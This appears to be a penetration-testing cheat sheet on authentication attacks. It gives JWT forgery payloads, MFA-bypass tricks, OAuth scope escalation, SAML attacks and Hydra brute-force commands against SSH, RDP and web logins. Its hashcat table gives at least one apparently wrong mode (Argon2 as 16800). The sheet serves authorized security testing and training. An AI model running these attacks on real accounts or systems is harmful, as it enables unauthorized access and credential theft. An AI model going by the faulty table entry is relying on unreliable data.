Quick Reference
Authentication Quick Reference
Hackers Manifest - hackersmanifest.com
Essential reference for modern authentication protocols, token formats, and common attack vectors.
OWASP & MITRE ATT&CK Coverage
Scope Validation
In OAuth flows, always check if you can escalate privileges by manually adding scopes (e.g.,
&scope=admin or &scope=read,write) to the authorization URL.
WebAuthn / FIDO2 / Passkeys
Phishing-resistant by design: origin binding + user-verifying gesture defeats traditional reverse-proxy phishing (incl. Evilginx).
Common weaknesses to test: downgrade to legacy MFA fallback (TOTP / SMS), account-recovery flows that bypass passkey, missing
userVerification: required, weak attestation acceptance, cross-origin iframe embedding.
Conditional Access bypass (Entra ID / Azure AD): device-code phishing, OAuth consent phishing (GraphRunner), illicit-grant via legacy auth endpoints, primary-refresh-token (PRT) theft with roadtools / AADInternals.
Step-up auth: some apps re-use the original session cookie after MFA — hijack pre-MFA, replay post-MFA.
🔑 OAuth 2.0 Grant Types
| Authorization Code | Confidential clients (server-side). Most secure. |
| PKCE | Public clients (SPA/Mobile). Prevents code interception. |
| Client Credentials | Machine-to-machine. No user interaction. |
| Implicit | Legacy (SPA). Tokens in URL fragment. Deprecated. |
| Device Code | Input-constrained devices (Smart TV). |
| Refresh Token | Exchange for new access token without login. |
🛡️ JWT Attacks
| None Algorithm | "alg": "none" (strip signature) |
| Weak Secret | Brute force HMAC secret (hashcat -m 16500) |
| Key Confusion | Change RS256 to HS256 using public key as secret |
| KID Injection | "kid": "../../../dev/null" (Directory Traversal) |
| JKU Misuse | Point jku header to attacker-controlled JSON |
JWT Tool Syntax
bash
python3 jwt_tool.py <token> -T -S hs256 -k public.pempython3 jwt_tool.py <token> -T -S hs256 -k public.pem🔓 MFA Bypass Techniques
- Response Manipulation: Intercept 2FA response, change
falsetotrue. - Status Code: Change HTTP
403 Forbiddento200 OK. - Direct Browsing: Force browse to
/dashboardor/adminskipping 2FA page. - Parameter Pollution:
email=victim@site.com&email=attacker@site.com.
bash
# Response Manipulation
# Intercept response and change:
{"success": false} -> {"success": true}
# Status Code Manipulation
# Change HTTP 403 Forbidden -> HTTP 200 OK# Response Manipulation
# Intercept response and change:
{"success": false} -> {"success": true}
# Status Code Manipulation
# Change HTTP 403 Forbidden -> HTTP 200 OK🌐 HTTP Auth Headers
| Basic | Authorization: Basic base64(user:pass) |
| Bearer | Authorization: Bearer <token> |
| Digest | Challenge-response (nonce, realm, qop) |
| API Key | X-API-Key: <key> or Query param |
| AWS SigV4 | Complex signature in Authorization header |
🐉 Hydra Syntax
SSH Brute Force
bash
hydra -l user -P passlist.txt target sshhydra -l user -P passlist.txt target sshRDP Brute Force
bash
hydra -t 1 -V -f -l user -P passlist.txt rdp://targethydra -t 1 -V -f -l user -P passlist.txt rdp://targetWeb Form Brute Force
bash
hydra -l user -P passlist.txt target.com http-post-form "/login.php:user=^USER^&pass=^PASS^:F=failed"hydra -l user -P passlist.txt target.com http-post-form "/login.php:user=^USER^&pass=^PASS^:F=failed"#️⃣ Hashcat Modes
| MD5 | -m 0 |
| SHA1 | -m 100 |
| SHA256 | -m 1400 |
| NTLM | -m 1000 |
| NetNTLMv2 | -m 5600 |
| bcrypt | -m 3200 |
| Argon2 | -m 16800 |
| Kerberos 5 (AS-REP) | -m 18200 |
🎭 SAML Attacks
| XML Signature Wrapping | Move signed assertion, insert malicious one |
| Comment Injection | user<!-- comment -->@admin.com |
| Certificate Faking | Sign assertion with self-signed cert |
| Replay Attack | Resend valid assertion (check NotOnOrAfter) |
| XXE | Inject XML entities in SAMLResponse |
Generated from Hackers Manifest | For authorized security testing only | hackersmanifest.com